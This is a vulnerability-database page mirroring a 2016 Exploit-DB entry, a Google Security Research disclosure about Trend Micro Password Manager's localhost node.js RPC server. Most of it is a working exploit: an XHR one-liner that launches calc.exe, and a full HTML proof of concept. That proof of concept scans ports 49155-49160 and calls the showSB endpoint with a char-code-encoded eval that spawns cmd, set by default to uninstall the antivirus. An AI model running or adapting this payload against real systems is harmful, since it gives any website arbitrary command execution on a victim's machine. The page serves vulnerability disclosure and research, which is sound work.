Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands

🗓️ 11 Jan 2016 00:00:00Reported by Google Security ResearchType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 26 Views

Trend Micro Antivirus Vulnerability in node.js HTTP Serve

Code
<!--
Source: https://code.google.com/p/google-security-research/issues/detail?id=693

When you install TrendMicro Antivirus on Windows, by default a component called Password Manager is also installed and automatically launched on startup.

http://www.trendmicro.com/us/home/products/software/password-manager/index.html

This product is primarily written in JavaScript with node.js, and opens multiple HTTP RPC ports for handling API requests.

It took about 30 seconds to spot one that permits arbitrary command execution, openUrlInDefaultBrowser, which eventually maps to ShellExecute().

This means any website can launch arbitrary commands, like this:

x = new XMLHttpRequest()
x.open("GET", "https://localhost:49155/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);
try { x.send(); } catch (e) {};

(Note that you cannot read the response due to the same origin policy, but it doesn't matter - the command is still executed).
-->

<html>
<head>
    <title>Trend Micro Maximum Security 10 Exploit</title>
</head>
<body>
    <p>
    Sample exploit for Trend Micro Maximum Security 10.
    <p>
    -- Tavis Ormandy.
    <p>
    Command: <input id="command" value="C:/PROGRA~1/TRENDM~1/Titanium/Remove.exe" size="64">
    <p>
    <a href="javascript:begin()">Click Here</a> to run the command above (the default will uninstall Trend Micro Maximum).
    <p>
    <img src="http://reactiongifs.us/wp-content/uploads/2013/02/awesome_to_the_max.gif">
<script>
    function begin() {
        // The command you want to run, arguments will work but don't use single quotes.
        // Lets uninstall Trend Micro.
        var cmd  = document.getElementById('command').value;

        // Start port, Trend Micro trys top open a port starting here until it works.
        var port = 49155;

        // Wrapper code to start cmd.
        var code = "topWindow.require('child_process').spawn('cmd', [ '/c', '" + cmd + "' ])"

        // We can't send quotes, so encode that via character codes.
        code = code.split('').map(function(a){ return a.charCodeAt(0) }).join(',');

        // Create the XHR's
        for (; port <= 49160; port++) {
            var x = new XMLHttpRequest();

            x.open('GET', 'https://localhost:' + port + '/api/showSB?url=javascript:eval(String.fromCharCode(' + code + '))', false);

            // We can't tell if it worked because of the cross domain policy.
            try { x.send(); } catch (e) {};
        }
    }
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Jan 2016 00:00Current
7.4High risk
Vulners AI Score7.4
trend micro antivirusvulnerabilitynode.jshttp servercommand execution
26